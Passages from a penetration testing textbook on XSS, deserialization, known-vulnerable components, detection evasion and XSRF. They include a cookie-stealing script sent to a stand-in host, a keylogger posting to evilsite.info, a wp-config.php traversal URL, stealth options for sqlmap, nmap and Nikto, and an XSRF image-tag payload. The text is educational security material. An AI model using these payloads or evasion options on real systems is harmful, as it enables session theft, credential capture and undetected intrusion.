https://evilsite.info/search?query=<script>document.location='
https://cookiecapture.example.com/cookiestealer.php?
cookie='+escape(document.cookie)</script>
When running, we can view the real-time logs depicting what the tool is
doing (which URI it is attacking/crawling, the payload it is sending, various
headers) and see if/when it identies a vulnerability. Outputting the results
of the testing to a le enables a quick grep (seen in Figure 8.5) to identify
the attack strings it is sending, cat LOGS | grep 'attack with'.
The GUI provides a wizard, custom settings, and a nice feature of building
the CLI command based on our preferences in the GUI. We can see this once
we specify our settings and click the "Aim" button as seen in Figure 8.6.
Once vulnerabilities are identied with this tool, we will want to manually
provide a payload to exploit the aw. A great way to do this and ignore
character restrictions on the vulnerable parameter's input is by specifying
our own remote code. By doing so we can pull in an entire library, thousands
of lines of code (with one XSS command). This will in turn inject the full
exploit into our victim's browser; we do this by specifying the path to our
hosted payload. Keep in mind we do need to host the malicious JavaScript
somewhere on the web for this work, yet another reason for a VPS or cloud-
hosted server to be included as part of our standard tool-set. Alternatively,
in a lab environment, we could simply host the script locally to simulate
the same concept. However, know that in a real-world scenario, we will need
to host the malicious code from an HTTPS-enabled website with a valid
TLS certicate to ensure the browser loads content correctly (as opposed to
throwing an untrusted content error and refusing to load the JavaScript).
Let's explore injecting a keystroke logger as our payload.
128 The Penetration Tester's Guide to Web Applications
We inject this malicious code into the vulnerable application by using the
"src" attribute in our payload and dening the location of where the script is
located. To be clear, the vulnerable website has a form (as depicted in Figure
8.8), we are submitting a script into the form, and subsequently the script
will be included as part of the page the victim visits at a later time.
OWASP A7:2017 Cross-Site Scripting (XSS) 129
Now when the victim user browses to this same web application and sub-
mits their name and message, the resulting page loads in their browser and
includes our malicious JavaScript. This JavaScript will proceed to log every
subsequent keystroke made while on the exploited page. While the payload
is persistent (stored in the back-end database and served to unsuspecting
visitors), it only executes on this one page on this one web application until
a victim browses somewhere else or closes the browser. The payload works
well in this context and we can see in Burp that each time a key is pressed, a
POST request is being sent to evilsite.info/log.php (Figure 8.9) with a simple
payload of the parameter "k" and the value of the key which was pressed.
130 The Penetration Tester's Guide to Web Applications
At this point we can see the keystroke logging JavaScript is working as in-
tended and now we need to focus on logging the results. Using PHP (or most
any language we want), we can write a few lines of code to handle the POST
request, open and append the results to a le, and account for potential is-
sues. Note that SELinux may be a hurdle and the "keylog.txt" le, referenced
in Figure 8.10, will need to be writeable for PHP to be able to write to it.
Looking at the results of the exploit we can see the payload submitted by
one of the victims.
OWASP A7:2017 Cross-Site Scripting (XSS) 131
With this information we can proceed to manually verify the results and
craft a suitable payload. The fact the vulnerability is a reected GET re-
quest makes our job easier, as we can utilize the address bar in our browser
to tweak the payload and immediately see the results. This also bodes well
as we need the vulnerability to be exploitable via the GET method for our
planned email delivery mechanism to work. In the event the vulnerability is
found via a POST request, we can often simply convert the POST request to
a GET request by examining the contents of the POST payload and recon-
struct them as GET parameters. As an aside, when we can convert a POST
request to a GET request this is called a method interchange vulnerability. In
order to steal a victim's cookies, our payload can consist of a reference to the
vulnerable web application and a redirect request appending all of the avail-
able victim cookies for the domain as a string sent to our attacker-controlled
web server. To test the code, we can submit a request with an alert box show-
ing the cookies for the domain (as shown in Figure 8.13) of the vulnerable
web application: <script>alert('document.cookie');</script>.
We'll add onto this with the redirect code to tell the victim's browser to make
a new HTTP request to our server, but in the request, include the cookies the
browser has saved for the current web application it is visiting. Once again, to
be clear, the victim user browsing to evilsite.info has a session token/cookie
(PHPSESSID) denoting that the user is logged into the evilsite.info web ap-
plication. When the victim receives our crafted XSS attack via email, their
browser will load the request to evilsite.info and make a new request to a
malicious site of our choosing while including the PHPSESSID cookie from
evilsite.info in the new request. In this way we are able to steal the cookie
because it is sent directly to a location of our choosing, from the victim's
browser, per our email link containing the malicious request. The redirect
OWASP A7:2017 Cross-Site Scripting (XSS) 133
At this point we are able to use the compromised cookie to access the applica-
tion as the victim user. We can do this by using our browser/add-ons to alter
our current cookie to that of the stolen value or by using our interception
proxy to modify the cookie being transmitted to the web application. For
instance, navigating to Burp's "Project Options" -> "Sessions" -> "Cookie
Jar" section (shown in Figure 8.15) allows us to modify our current PH-
PSESSID cookie to the new value. Any subsequent requests to evilsite.info
will include this compromised cookie value and grant us the same level of
privilege as the compromised user/session. Note that once we or the legiti-
mate user logs out of the application, the cookie is no longer valid.
134 The Penetration Tester's Guide to Web Applications
often than not, attacking the user of an application is not allowed and in
these situations, a simple alert box proving the existence of the XSS aw
may actually be sucient. If the client/business fully grasps XSS and the
risks associated with this aw, then we likely don't need to spend more time
crafting a robust exploit, especially if we don't have a target victim for the
attack. Conversely, when attacking users is allowed, we need to be prepared
to launch more complex attacks such as harvesting credentials, obtaining ses-
sion tokens, defeating XSRF protections, and directly attacking the browser.
Several tools exist to help nd XSS aws but the onus is on us to create a
working payload specic to our target application. In most cases we need a
remote location to store our code (or have the victim connect to), in order
for our attack to be fruitful. XSS attacks can be potent but the adoption
of content security policies, browser defense mechanisms, and better coding
practices/frameworks makes our job more challenging. Because of this, hav-
ing mature tools and relying on our reproducible methodology are keys to
successfully identifying XSS. Once identied, our ability to exploit XSS in
a meaningful way relies on our skill set and quality of tools, the latter of
which can be eeting. Before conducting any penetration testing, we always
have explicit written permission, and when we incorporate potent XSS at-
tacks targeting users of the application, we want to make sure this topic has
clearly been discussed and included in the rules of engagement.
Chapter 9
Details: Insecure deserialization was added to the OWASP top ten for 2017
based on input from the information security community as we have seen a
signicant uptick in this type of aw being exploited along with the potential
for abuse. To understand this aw, let's take a moment to discuss serializa-
tion. The process of serializing objects or data means to convert data from
a less-than-ideal form for transmission to a byte-stream (commonly using
JSON) that can easily be sent across the wire. Typical objects which are se-
rialized might be arrays of data or binary data structures. The reason these
objects are serialized is so they can easily be sent from the client to the server
while preserving the structure of the data the data attributes, elements,
and hierarchy. A typical object might look like Figure 9.1.
137
138 The Penetration Tester's Guide to Web Applications
cause harm to the application. This should be reminiscent of XXE from the
perspective of a vulnerable parser; this should also be reminiscent of injection
from the perspective of inserting a malicious payload. Exploiting this aw can
lead to privileges escalation or otherwise bypassing access controls as well as
denial of service and remote code execution. The attack surface for exploiting
this aw consists of client-controlled input which will be serialized and sent
to the server. Thus, the way we attack this aw is by injecting malicious
code into an object we can control. Typical places to look for serialized data
range from cached storage objects and APIs to cookies, View State, HTTP
headers, and parameters.
Identifying insecure deserialization takes eort and builds on our previous
work of reconnaissance and mapping. During these phases of our methodology
we should have been able to determine the platform, including programming
language(s) being employed by the application. While this aw is technology
agnostic, the way we identify and exploit it is very specic. For Java-based
applications there are several indicators of a serialization process being used
such as an HTTP header including, "application/x-java-serialized-object" as
well as r0O (the letter r, the number 0, and the letter o) in base64 encoded
data as well as a HEX signature of AC ED 00 05. For C Sharp/.NET appli-
cations we can leverage our proxy and search for a base64 encoded string of,
"AAEAAAD/////" as well as client-side code containing the strings, "Type-
Object" and "$type:" as these are all indicators of a serialization process in
place. We can also use other previously described tools to help identify com-
ponents which may be vulnerable to this aw (such as third-party libraries).
If we have access to the source-code, as an in-house penetration tester, know
that there are additional language-specic checks we can perform.
modify to alter the resulting serialization process. One way to help determine
which input results in modied output is by using Burp's repeater, akin to
ZAPs Open/Resend request editor. By using this tool, we can visually see a
dierence in responses after we make a change to the input, or we can select
two requests from the proxy history and choose to send the responses to
the Comparer tool in order to accurately identify a change in the serialized
output. An example of this is shown in Figure 9.4.
Figure 9.4 Burp's Comparer showing seven color-coded dierences between the two
responses.
Once we know our input has a measurable impact on the serialized output,
we can identify which exact input we need to fuzz. To help with the task
of identifying and eventual exploitation of this aw we can use several Burp
extensions: Java Deserialization Scanner (for PRO versions of Burp), Java
Serial Killer, and Java Serialized Payloads. By sending the POST request to
the Java Deserialization Scanner extension, we can then set the applicable
insertion point as we would with an intruder scan, as seen in Figure 9.5.
142 The Penetration Tester's Guide to Web Applications
Java, PHP, Python, node.js, .NET, Ruby, and other languages can be sus-
ceptible to this type of attack although the tools we use to exploit other
language-specic vulnerabilities will vary. Let's take a look at some examples
of full exploitation.
With this information we can try to launch a serializtion attack; even without
this information we could blindly try. However, in looking at the HTTP
response headers (depicted in Figure 9.9) we can see the CGI language is
Python and using this knowledge we can craft a suitable attack.
Figure 9.9 Viewing the HTTP headers and noting the CGI language.
The vulnerable web application takes multiple forms of input via text inputs
as well as a le upload feature. We can use our interception proxy to get
an idea of what a valid POST request looks like when constructed using the
selections from the drop-down menus in the form. In looking at the payload
of the POST request we can see there are four parameters: Date, Record
Name, Author, and Recipient. Submitting a request immediately shows the
results in the lower portion of the page with the input name and value in
a table format. We can see this in Figure 9.10. Uploading an unformatted
le results in a 401 HTTP response, however. While the application is likely
using Python, indicators of serialization are in fact not readily evident.
146 The Penetration Tester's Guide to Web Applications
To that end we can write our own python script, upload it to the application,
and depending on how the application processes it, perhaps get our code to
execute. We know that during a serialization attack our input will rst be
serialized, by us or the application, and then subsequently deserialized in an
unsafe manner. We can once again infer that our attack is making it past the
deserialization process, is syntactically correct, and meets the requirements
of application's upload feature based on the responses or errors we receive
when uploading the le.
Simply uploading the code described in Figure 9.13 will not suce as the
function has no way to be called and executed. Thus, we would want to alter
our attack to leverage a multi-upload approach in which one le gets uploaded
and a second uploaded le references a function in the rst to execute the
code based on the deserialized construct. Or we could take advantage of
the pickling process to dene a function which, when deserialized, will be
executed. We can see this in Figure 9.14.
148 The Penetration Tester's Guide to Web Applications
151
152 The Penetration Tester's Guide to Web Applications
ment technology; competing solutions oer their own pros and cons so that
anyone from individuals to fortune 500 companies, is free to develop the sys-
tem that best meets their needs. When discussing open-source software and
technology, we have to understand that a signicant amount of software is
supporting the web application from the stack, which we already discussed, to
authentication/authorization services, containerization, frameworks, parsers,
APIs, microservices, analytics, payment processing gateways, a plethora of
third-party code, and underlying technology. This technology directly or in-
directly supports the web application we are responsible for testing and thus,
the onus is on us to understand and test it for susceptibility to weaknesses.
We can typically leverage NVD, security advisories, bug trackers, GitHub
issue trackers, and the like to thoroughly search for known vulnerabilities
for a given set of components. Identifying the components is straightforward
for all client-side technology, but more challenging for server-side software.
There are several automated scanning tools which will help nd vulnerabil-
ities based on version numbers, but of the hundreds of thousands of known
software vulnerabilities, only a fraction of vulnerability scanning tools have
checks built to identify them.
Anyone can write software and publicly release it just as anyone can
choose to use that software (with some restrictions), but what happens when
no one updates it? What happens when a vulnerability is discovered, and
patched, but that patch is never installed? What happens when a business
has hundreds of applications, patches them regularly, but is not aware of all
dependencies? In each one of these situations there is attack surface. We need
to recognize this attack surface, identify applicable aws, nd a matching
exploit or write our own, and measure the subsequent risk of the vulnerability.
Depending on the criticality of the application and its level of sensitivity,
using components with known vulnerabilities can be more devastating than
all other entries on the OWASP top ten list. Remember Equifax?
Real-World Dialog: The year 2014 was signicant for critical security vul-
nerabilities being released. Some of the most impactful aws were Drupalged-
don, ShellShock (Bash Bug), and Heartbleed. I was a Senior Security Engineer
working in the nancial sector for a billion-dollar entity, and was responsible
for, among other things, identifying our company's exposure to these critical
vulnerabilities. Heartbleed ended up being the biggest threat for us.
At that time our threat and vulnerability management program was ma-
ture enough to provide me with a snapshop of all system vulnerabilities and
Rapid7/Nexpose had released a check for Heartbleed in addition to the pub-
OWASP A9:2017 Using Components with Known Vulnerabilities 153
licly available Perl script everyone at the time was using to check for the
vulnerability. The overwhelming majority of our servers were running Win-
dows with Microsoft's TLS implementation, which was not vulnerable, but
we had a large footprint. We owned/leased a slash 20 (4,096 external IP ad-
dresses) that did not even include our remotely hosted systems. With over 100
domains, several signicant business units and thousands of servers, work-
stations, network devices, appliances, printers and more, the challenge was
ensuring we were scanning everything we owned or were otherwise respon-
sible for. At one point during my quest to make sure all of our assets were
scanned, I even made the overzealous mistake of actively exploiting Heart-
bleed, dumping RAM, obtaining credentials, logging in with those credentials
on a domain which was very similar to one we owned but alas was not ours
(oops).
By the time three days had elapsed since the original public release of the
vulnerability, my team and I felt condent the enterprise was not at risk since
all known Heartbleed vulnerabilities (however limited) on internal systems
had been patched, and externally available systems were scanned and found
to not be vulnerable...or so we thought. The next day we learned of our
oversight. Working on the enterprise security team, my colleagues and I were
responsible for making sure all business units under the corporate umbrella
were included in regular scanning. One business unit, however, was not being
completely scanned, at least not by my team. A client/user of this business
unit's services (just a regular person on the internet) made the discovery
by using the same Perl script to exploit the OpenSSL implementation on
a WAF. He took a screenshot, sent in an email to the business's general
contact mailbox, and that message quickly made its way through the process
of escalations until reaching the president of the company, as well as all C-
level executives and subsequently my team's email distribution list. It was
an epic fail on the part of enterprise security. How could we scan everything
for multiple days and miss this? The impact to the business was nonexistent
as there was no evidence of abuse, but the impact to my team's reputation
was real.
At the same time, my previous employer was mostly a Linux shop and
fared MUCH worse as they had just over 500 publicly exposed servers run-
ning the vulnerable OpenSSL version. In the days and weeks that followed
the public release of Heartbleed one could always tell who was impacted by
looking at the SSL certicate's date of issue; if it was issued within the last
week that was a pretty clear indicator that the system was vulnerable and
the proper remediations took place to remedy the situation.
154 The Penetration Tester's Guide to Web Applications
tion security community, and more broadly as a society, don't have a history
of blaming the victim when a 0day is used, and of course the very nature
of a 0day means there is no signature for it. Hence known vulnerabilities
are what we need to focus our attention on as we can usually easily iden-
tify them. In most cases we do this by using a vulnerability scanning tool
and other automated scanning solutions. Before we discuss tool usage, let's
revisit our luxury of time as it relates to 0day vulnerabilities. There will be
times when we are suciently motivated (halfway through an engagement
with no access to any systems) to focus attention on discovering a new vul-
nerability. The 0day terminology is more reserved for previously undisclosed
vulnerabilities with the potential for great impact (not necessarily reected
XSS on a homegrown app with a minimal user base), but any new vulnera-
bility we discover can still be used as part of our engagement and responsibly
disclosed to the vendor. Finding vulnerabilities in software components is
usually accomplished by reviewing the source code (in open-source projects
for example), identifying criteria that causes the software to malfunction,
or by other fuzzing techniques. While time-intensive (between identifying an
error condition and crafting a suitable and reliable attack), exploring new
vulnerabilities can be fruitful and is certainly a skill set to sharpen.
Oftentimes discovering new vulnerabilities is not necessary, however, as
there are enough application layer vulnerabilities to take advantage of. Using
a vulnerability scanning tool is a great way to nd these; enter Nikto. Nikto
is a free tool written in Perl that we can use to scan web applications for
thousands of potential issues. Nikto is not a full-featured web application
vulnerability scanning solution but it is free, it does work well, it is updated
regularly, and it is mature software (reliable). For these reasons it is a go-to
tool to gain an initial idea of the attack surface of an application. As a CLI
tool we invoke it by specifying nikto.pl -host https://evilsite.info, but not
before changing the default user agent.
Nikto is not designed to be stealthy; in fact, by default it will send a user
agent string clearly identifying itself to the target system, and because of
this, it will be blocked by any properly tuned IPS/WAF. It's not uncommon
for someone new to the tool to run it, get no results, and be oblivious to
the fact that the scans were all being blocked by an intermediary device. If
Nikto is installed as part of our OS then /etc/nikto.conf is the location of
the conguration le we need to edit. Likewise, if we download the tool then
the nikto.conf le located in the downloaded archive will be the le we need
to modify to alter the user agent string. We can see this in Figure 10.1.
156 The Penetration Tester's Guide to Web Applications
A quick way to obtain a common user agent string is by using our browser
to conduct a web search for "what is my user agent", copying the resulting
string and pasting it into the appropriate section in Nikto's conguration
le. We can just as easily tell Nikto which agent to use during runtime via
the -useragent switch; the takeaway is to never use the default agent. This
process is depicted in Figures 10.2 and 10.3.
Figure 10.3 Modifying Nikto's conguration le to change the user agent.
OWASP A9:2017 Using Components with Known Vulnerabilities 157
Running the tool produces output on the command line conveying identi-
ed issues. The tool will always mention missing security headers that are
useful for client-side attacks. In addition, Nikto will communicate the path
on the server where the issue was discovered, which makes reproducing the
nding easier. We denitely need to manually verify the results as Nikto,
like other tools, will produce false positives such as incorrectly identifying
vulnerabilities or incorrectly keying o of HTTP 200 response codes. There
are a multitude of conguration options we can modify to get more targeted
results, running nikto.pl -H will output an extended help menu showing the
various options available. Outputting scan results to a le with the -o option
is useful as is running the tool through a proxy to help see what trac it
is submitting as well as enabling evasion, tweaking the max timeout, and
specifying a hard stop time for the scan. Figure 10.4 shows the results of a
Nikto scan.
The initial Nikto scan didn't nd much but it also didn't spider the site, an
important piece of information we should be aware of. In fact, in looking at
our interception proxy (if congured to do so) or HTTP access logs, we can
see Nikto spends lots of time/makes lots of requests for default le names (we
can see this in Figure 10.6) and does not provide robust coverage for testing
the OWASP top ten for example.
Nikto is quite useful for nding les indicative of compromise or poorly con-
gured application components, but it is limited in what is searches for;
another tool to explore is wapiti. Wapiti is another free tool, this time writ-
ten for Python3, which has support to identify File Inclusion vulnerabilities,
Command Execution, Injection vulnerabilities, as well as more typical issues
like XSS and certain miscongurations. We can run Wapiti just as easily as
Nikto with simple command execution from our terminal. An example of
doing so is shown in Figure 10.7.
This time when we examine the HTTP access logs to see what requests Wapiti
made, we note there are only four. Not particularly indicative of a thorough
test. We can see this in Figure 10.8.
The reason for this is that there are no parameters included with the request,
and the home page for evilsite.info was essentially a blank page. The reason
it is important to see a lack of useful ndings is to make it clear that tools
are often very close to useless if we don't congure them correctly and know
how they work.
Focusing on evilsite.info, performing some initial recon to help guide our
tools like Wapiti during their scanning process can be accomplished with
archive.org, web searches, and forced browsing. We are looking for the ex-
istence of other folders and pages on the website. Archive.org made several
archives of the website throughout the years, and it looks like evilsite.info was
used for various phishing campaigns. Search engine queries don't return any
useful results, but guessing directories with a forced browse attack does re-
veal several potentially useful directories. By manually browsing to /xss.php
we can see what looks to be a training environment with a vulnerable form.
Pointing Wapiti to this form and providing a base GET request (submitting
the form presented on the page) results in the tool nding one XSS aw
which we can see in Figure 10.9.
most direct way to nd vulnerabilities. Additionally, we will make heavy use
of public resources to glean more details about a given aw as it pertains to
example attacks, exploit code, and our research eorts. With this knowledge
and exposure to a couple of potentially useful tools, let's cover some examples
of how to exploit applications using components with known vulnerabilities.
Examples: WordPress is a popular CMS for which many people have written
plugins, of which many are known to be vulnerable. When testing a Word-
Press application and discovering a known vulnerable component, one of our
rst instincts may be to search metasploit for a matching exploit. Doing so
usually leads to disappointment: A search for WordPress exploits yields less
than seven for all of 2018. A more appropriate tool to identify and subse-
quently exploit WordPress vulnerabilities would be a combination of WPScan
(a tool designed specically to nd WordPress vulnerabilities) and the ex-
ploit database. We can invoke WPScan (WordPress scan) from within Kali
with a succinct command of wpscan url http://evilsite.info/blog. The results
of this scan will usually reveal outdated plugins and specic vulnerabilities
based on the identied version number of the install (see Figure 10.10).
With this information we can scour exploit-db.com looking for exploit code.
In doing so, based on the version, 1.0.11, of the Ad Manager Wd plugin we
can see that with a simple GET request we can execute an arbitrary le
download. With this information, access to the wp-cong.php le is granted
via the HTTP GET request referenced below and depicted in Figure 10.11.
http://evilsite.info/blog/wp-admin/edit.php?post_type=wd_ads_ads
&export=export_csv&path=../wp-cong.php
OWASP A9:2017 Using Components with Known Vulnerabilities 161
(Figure 10.15) which, when we follow it, leads to a list of Tomcat vulnerabil-
ities based on the dierent versions.
From this list we are shown a link to the CVE which in turn shows us the link
to the exploit database where the exploit code resides. Not to be overlooked
are the various mailing lists and links to other relevant discussions and back-
ground information on the CVE. We want to have a thorough understanding
of what the aw is, how it can be exploited, and what prerequisites are re-
quired. This is crucial information because we want to have more than cursory
information about the vulnerability prior to vetting the exploit code, which
is shown in Figure 10.16.
What should be clear from this dialog is that we don't run a scan, nd a
CVE, search for random exploit code, and execute it against our client's
environment. Instead we vet the code from a trusted source, executing it in
a test environment after adequate research. Short of doing so we may end
up creating a DOS condition, exposing sensitive information to an attacker
or worse. Professionalism matters. Proceeding with our research into this
CVE and exploit code we want to conrm the version of the vulnerable
software component, and that which the exploit says it targets. From there we
164 The Penetration Tester's Guide to Web Applications
manually review the exploit code and ideally setup a target/test environment
with the vulnerable version of software. Even if we don't have the matching
vulnerable software available in a test capacity, we can still test the exploit
code against a suitable target to help ensure it does what we think it will do.
We can see the Apache logs showing the results of executing the exploit in
Figure 10.17.
Once vetted, we can launch the exploit against our target environment and
be greeted with a means to execute commands on the remote system via a
web shell. In some cases, we will need to modify the exploit code to suit our
needs or otherwise get the code to work in our specic situation.
Looking back at the initial Nessus scan results reveals that the scanner
may have missed several vulnerabilities. This is not uncommon but it can take
eort to try and determine which aws exist but are not reported. Looking
at HTTP response headers shows that one of the applications running on
evilsite.info appears to be Tomcat, as previously identied, but a closer in-
spection of default conguration les identied with Nikto shows that one
of the underlying applications may be running Apache Struts as shown in
Figure 10.18.
OWASP A10:2017
Insucient Logging and
Monitoring
Denition: Insucient logging and monitoring, coupled with missing or in-
eective integration with incident response, allows attackers to further attack
systems, maintain persistence, pivot to more systems, and tamper, extract,
or destroy data. Most breach studies show time to detect a breach is over 200
days, typically detected by external parties rather than internal processes or
monitoring.
Details: Writing software takes time, eort, and patience, especially when
debugging. The best information at every developer's disposal to help with
this process is logs. Logs are so important to the software development process
that there are typically levels of verbosity we can congure to display more
information in log output when needed. We see this in the tools we use as
penetration testers. If we try to download something with WGET and receive
an error we can invoke the -d ag to enable debugging. In sqlmap, tcpdump,
and nmap we can invoke -v(v)(v) to get a clearer picture of what the tool
is doing, what it is seeing, and what is causing an error, respectively. With
Apache, IIS, Nginx, and every programming language we have discussed (and
the ones not mentioned) as well as every software component, we have the
ability to log information.
167
168 The Penetration Tester's Guide to Web Applications
As we proceed to exploit the rst nine most critical web application vul-
nerabilities, it will behoove us to take meticulous notes because a typical SQL
injection attack may result in multiple ndings if it is discovered that there
were no logs associated with our attacks.
How to Exploit: The impact and even the ability to successfully exploit
every vulnerability we have discussed so far in this book could have been re-
duced/thwarted with proper logging and alerting. With this understanding,
and given the nature of this aw, it may seem counter-intuitive to expend
eort being stealthy with our attacks. The reality is that we don't know what
we don't know, and crafting attacks which do not trigger alerts is something
we typically can't plan for without knowing the details of the target infras-
tructure. The rules of engagement, however, are what we can rely on to help
guide our decision making as we engage the client or business. Communicat-
ing with the business to determine if our attack trac should trigger alerts,
and then conrming what certain attacks actually do, is a valuable conver-
sation to have to help the business tune its security systems. Likewise, if the
concept of specically testing this control is not brought up with the business
then we can proceed to attack as normal. The way we exploit a poor logging
OWASP A10:2017 Insucient Logging and Monitoring 171
and alerting aw is by attempting to evade detection and ensuring our attack
trac doesn't raise alarms, but, of course it is more complicated than that.
Primarily it is more complicated because of our lack of knowledge about the
infrastructure, and also because the business can fail this check even if the
right things are being logged and alerted on (if people are not reviewing and
responding to the alerts). For these reasons, the way we exploit this aw can
morph into a series of specic attack scenarios where we coordinate with the
business on what/when we are testing, and they provide evidence of logs and
alerts correlating to our attacks. This means that part of our nal report will
include screenshots provided by the client showing/proving they were aware
of the attack, able to respond to it, and take appropriate action, in the event
the client can provide this.
As we conduct our penetration testing following our normal methodology
our actions will be blocked, logged, or successfully penetrate the applica-
tion/organization and not trigger any alerts. Unless specically guided to
do so based on what was previously discussed, there is no need to alter our
process or do anything special to test for insucient logging & monitoring.
This assumes we are conducting a thorough test, properly noting our attack
timing, and professionally engaging in ethical attacks. With that, let's talk
about what it looks like to exploit this aw, and deepen our understanding
of coordinating with the business to measure a failure versus a success of this
vulnerability and the applicable security control, respectively.
the system, paying for terabytes of storage and salaried positions to operate
the solution can cost millions of dollars, which does not factor in maintenance
contracts and other team members' time to get the most out of the system.
Because of this it is not uncommon to see SIEM integration fall into one of
three categories: large enterprises fully vested in their SOC's success, large
enterprises with a contractual obligation to have a SIEM in order to check
an audit box, and nally the "other" category, which either has no SIEM
or only has components of a SIEM at various stages of implementation. The
rst category can be exploited due to being too large, too complex, and too
disparate despite their best intentions; things will get missed and not all
applications will be congured to log useful logs that could aid in thwarting
attacks. The second category can be exploited due to a lack of expertise,
oversight, and minimal coverage. The company wants to pay to log what's
contractually obligated, but neglects other systems as it would raise the price,
which results in our attacks of other systems going unnoticed, and subsequent
compromised hosts being used as pivot points to the high-risk targets. We
can successfully exploit the third category due to a lack of complete coverage
or only rudimentary alerting being implemented, resulting in some alerts
being generated but no one being notied. In the event we do need or want
to reduce the noise our attacks create and our likelihood of detection, some
of our tools can provide us with options to be more clandestine just as our
techniques can be altered to evade.
This rst example uses nmap. Other than adjusting timing (such as the
delay between packets), we can alter the source IP/port that packets will
appear to be sent from as well as append custom payloads to packets and
utilize proxy chaining. We can see some of these options in Figure 11.1.
thus don't trigger an alert. For example, using nmap with -D (Decoy scan)
simply spoofs some of the source IP addresses nmap will send; of course,
responses from the target system to those spoofed addresses will never reach
our interface since this technique merely attempts to bypass scan detection
lters. Nmap does have a more interesting zombie (or Idle) scan which uses
dierent and more complex means to the same end. This is interesting and
useful, but when used to probe internet-facing systems it's not typical for a
SOC to be alerted and respond to every port scan; in the industry this is
what is referred to as rain on the umbrella. On the internal network, post
exploitation, is where such evasion techniques will prove to be invaluable as
an internal sensor detecting a port scan from a non-scan engine likely would
warrant further investigation.
Some of the various features of sqlmap were mentioned in chapter 2,
and we can expand upon that by looking into how to invoke various lter
evasion options when utilizing the tool. As seen in Figure 11.2, the commands
invoked include random-agent, tor, delay 12, hpp, dmbs=mysql and
tamper=unmagicquotes.py as they pertain to options helpful for making our
attack slightly stealthier.
options results in a lot of malicious trac being sent from our machine with
no hope of evading even the most basic detection tools.
Conversely in Figure 11.4, we can see the source address of TOR, a believ-
able user-agent, amply spaced requests (in terms of time delay), the HTTP
pollution, and tamper eects all taking place as we specied in the hopes of
going unnoticed.
This next example takes another look at Nikto. In addition to changing the
default user agent, we have a couple more options such as modulating cAsE,
URI encoding, and attempting to bypass detection lters by including ran-
dom strings with each request. Another option to aid in our lter evasion
endeavors is to tune the trac Nikto sends to remove the checks we think
will be fruitless, such as checks for elements associated with the target envi-
ronment we know don't exist (like references to /etc/passwd, .ssh*, .htaccess
if the target system is Windows running IIS). In addition, we can tune Nikto
to use only certain plugins, and use the tool more like a traditional scanning
tool but with more specicity. Options for Nikto are shown in Figure 11.5.
of nding a aw based on previous recon eorts coupled with tuned scanning
requests. For example, by invoking Nikto with the -evasion 6, -Plugins 2,
-Tuning e options, we can selectively choose to utilize "tab" as a space, have
Nikto guess for password le names, and scan for administrative consoles.
Nikto -H will show an extended menu where such options can be selected.
The results of the scan as seen from the webserver logs of the target machine
show a targeted attack which would likely bypass some lters, but is still
noisy and not necessarily doing what we told it to do. There is no evidence of
using tabs and no evident/real password lename guessing or admin console
scanning, as we can see in Figure 11.6.
Details: This chapter will focus on two specic vulnerabilities: Cross Site
Request Forgery (XSRF or CSRF) and username harvesting (or account enu-
meration). While XSRF is no longer on the OWASP top ten list it is still
a prevalent vulnerability and worth our time discussing as, when exploited,
it can lead to serious impact. Username harvesting is a subset of broken
authentication and, in addition to being extremely prevalent, requires more
discussion as it too can lead to signicant user impact.
XSRF is an attack which takes advantage of the trust an application has
in an established session. Reread the last sentence and absorb the depth of
what it means. When we authenticate to a web application via basic, digest,
integrated or forms-based authentication using two-factor, oAuth, federated
identify we are proving we are who we say we are, and in turn being au-
thorized to make subsequent requests with the level of privilege assigned to
our account. We have successful authentication and in turn, established our
session. After authenticating, most applications don't require any additional
checks or conrmation of our identify regardless of what we request or what
transactions we submit. This is the inherent trust the application has given to
our established session. What XSRF does is takes advantage of that trust by
179
180 The Penetration Tester's Guide to Web Applications
tricking a user into submitting a transaction they did not intend to request.
This victim - attacker - vulnerable web application relationship is reminiscent
of XSS, but that is where the similarities begin and end.
The root cause of XSRF is a lack of transaction validation on the part
of the web application; specically, the application does not verify the user
intended to make the request and blindly honors any requests made from
an authenticated user. If the user's level of authorization is sucient for the
request being made, then it is honored. The XSRF attack in turn, instructs
the victim to make a request on behalf of the attacker, and since the request
originates (from the perspective of the application) from the authenticated
user (the victim), the application handles the request as if nothing is amiss.
Several things are required in order for this attack to work: predictable
parameters, a suitable payload, targeting a victim currently logged into the
vulnerable application, proper timing, and a risky transaction. When the
GET or POST parameters for a transaction remain static over time and a
random or unpredictable cryptographic nonce is not included in the request,
these are what are referred to as predictable parameters. This literally means,
for example, the "username" parameter is always called "username" and
the password parameter is always called "password" and so on. However,
the values for each parameter are of course free for us to change. A typical
example of XSRF would be a GET request making a banking transfer from
one user's account to another user's account; when this request is invoked
by the legitimate user we see it as just regular functionality, but when the
legitimate user is tricked into making this request and the application accepts
it, this is an example of XSRF. For this to work, we as the attacker must rst
understand what a valid GET request looks like, which means us performing
reconnaissance on the target web application, commonly with our own test
account. We proceed to leverage our browser and proxy to make the request
and view the details, respectively. The request we make is the basis of our
attack/payload; we merely need to alter the request to ensure money ows
from the account of our choice to the account of our choice. The important
thing to keep in mind is that the victim user will be making the request for
us; a request which we control entirely.
The idea of moving money maliciously is a good basis for an example and
at its crux it represents a risky transaction. If we send someone an email with
a link to a Google search and the user clicks the link, this user will be the one
making the Google search request even though we dened the details of the
search, the query string. This is not XSRF because it is failing to meet two
of the requirements: The user does not need to be authenticated to perform
Beyond the OWASP Top 10 181
this request and there is nothing inherently risky about submitting a search
request (in most cases). The reason why the victim needs to be logged in
to the application is because once authenticated, a user has the ability to
take actions with their level of privilege. This could mean updating their
password, making a nancial transaction, adding a rewall rule, creating a
new user or anything that we would classify as risky. Another important
note is that while the example mentions a GET request, we can just as easily
conduct a XSRF attack via a POST request.
Once we get to the point where we have identied the details of a risky
transaction and conrmed it is vulnerable to XSRF, the next step is to craft
our payload and host it somewhere or send it directly to the target victim.
If the vulnerable transaction is a GET request, we could simply craft the
suitable GET string and email it to the victim. If the victim were logged into
her account at the time of receiving the email and clicking the link in the
email, then our attack would likely work. This style of attack however would
certainly not be stealthy as the victim would be directed to the vulnerable
page in her browser and see the results of the request (and likely become
quite suspicious). An alternative way to get the victim to submit the request
would be to host the GET request on a website via an HTML image tag <img
src="https://example.com/attackparameters /> and email the victim a link
to this website. The image would not display (as it is not a valid image),
but the victim's browser would parse the HTML image tag and make the
request to example.com with the appended attack parameters. If we are able
to get the victim to browse to our attacker-controlled website, we can of
course launch other attacks against the user, but what makes XSRF special
